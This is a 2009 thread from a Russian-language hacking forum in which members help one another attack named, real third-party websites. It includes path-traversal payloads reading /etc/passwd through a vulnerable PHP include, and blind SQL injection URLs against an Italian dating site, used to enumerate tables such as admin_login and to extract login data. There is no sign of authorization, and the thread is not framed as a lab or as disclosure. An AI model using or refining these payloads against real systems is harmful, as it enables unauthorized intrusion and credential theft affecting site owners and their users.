Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    include_once ('./lang/'.$lang_include);

    возможно ли что-либо подинклюдить, кроме как с папки lang?
     
  2. Twoster

    Twoster Members of Antichat

    Joined:
    20 Aug 2008
    Messages:
    287
    Likes Received:
    402
    Reputations:
    159
    u36a, если RG - on, то ?lang_include=../../../(...)/etc/passwd
     
  3. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Да, если нету фильтра на ../
     
  4. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    я так понимаю, что фильтра нет, просто, если пишешь с ../ и указываешь любое имя файла, то уже нет ошибки о том, что файл не существует, это и насторожило..
     
  5. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=
     
  6. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Незнаю как раскрутить _http://www.lovepage.it/dating-online/cronologia.asp?id=%27%27
    Что поставить вместо id чтобы подбирать таблицы union+select+1 и тд
     
  7. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb'+and+if(ascii(substring((select+table_name+from+information_schema.tables+limit+0,1),1,1))>1,1,0)--+
     
  8. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    А как таблицы узнать?И данные выводить.
     
    #9088 2Fed123, 30 Sep 2009
    Last edited: 30 Sep 2009
  9. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    https://forum.antichat.ru/threadnav43966-1-10.html

    3.1 Посимвольный перебор
     
    1 person likes this.
  10. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Узнал что есть таблица admin_login.Как поля выводить и потом concat(login) типо того сделать.
    Извиняюсь за назойливость.
     
  11. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
  12. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Это к примеру как выглядит твой запрос поначалу.
    Конечно столбцы могут называться по другому, я тебе просто привёл пример.

    А вобще юзай поиск, или же читай тему про SQL Инъекцию.
     
    1 person likes this.
  13. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0
    http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=index.php так этот инклюд можно как-то раскрутить или не? Просто не понимаю есть фильтр или нет.
     
  14. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=../../../../../../../(...)/etc/passwd
    Скорее всего есть чем нету.
     
  15. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Это инклюд, но инклюд с фильтром.
    В lang нельзя использовать
    PHP:
    $values = array('/','\\','?','&','%','#','~',':',' ','<','>','*','+','@','"',"'",'|',"\r","\n","\t");
     
  16. 2Fed123

    2Fed123 Banned

    Joined:
    26 Feb 2009
    Messages:
    56
    Likes Received:
    5
    Reputations:
    0
    Была бы простая инъекция-непопросил бы помоши.Твое предложение к сожелению неподойдет :)
    Узнал что есть таблица acces.
    Когда делаю запрос _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(substring((select+column_name+from+acces),1,1))%3E=1,1,0)--+
    Ошибка.Пробовал перекодировать в хекс,все равно,но по ошибка и если попробовать _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(substring((select+column_name+from++CHARACTER_SETS),1,1))%3E=1,1,0)--+
    Прошу сильно не пинать-с блиндом только учусь работать( и с POST инъекциями :eek: )
     
    #9096 2Fed123, 30 Sep 2009
    Last edited: 30 Sep 2009
  17. M1ks

    M1ks Elder - Старейшина

    Joined:
    23 Aug 2007
    Messages:
    140
    Likes Received:
    9
    Reputations:
    0
    http://www.dneprohost.com.ua/dp.php?key=' вроде инъекция, но там запрос какойто необычный мб нужен, помогите
     
  18. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    943
    Likes Received:
    835
    Reputations:
    605

    http://forum.antichat.ru/thread104591.html

    Подчёркиваю: инъекция, это именно возможность влиять на запрос, возможность внедрить в него что-то, а не просто ошибка базы. (c)Jokester

    пробуй проверить ее на логику, не получается выполнить логику значит не SQl-inj
     
    _________________________
    #9098 HAXTA4OK, 30 Sep 2009
    Last edited: 30 Sep 2009
    1 person likes this.
  19. u36a

    u36a Member

    Joined:
    18 Nov 2008
    Messages:
    81
    Likes Received:
    5
    Reputations:
    0

    Так как только с GET полявляется .. или / ошибки пропадают, откуда я знаю обход срабатывает или нет?

    Этот инклюд тоже глухой?
     
    #9099 u36a, 1 Oct 2009
    Last edited: 1 Oct 2009
  20. smth

    smth New Member

    Joined:
    14 Sep 2009
    Messages:
    8
    Likes Received:
    2
    Reputations:
    0
    Тут вообще его нет =\ похоже на ошибку в логике скрипта
     
Loading...
Thread Status:
Not open for further replies.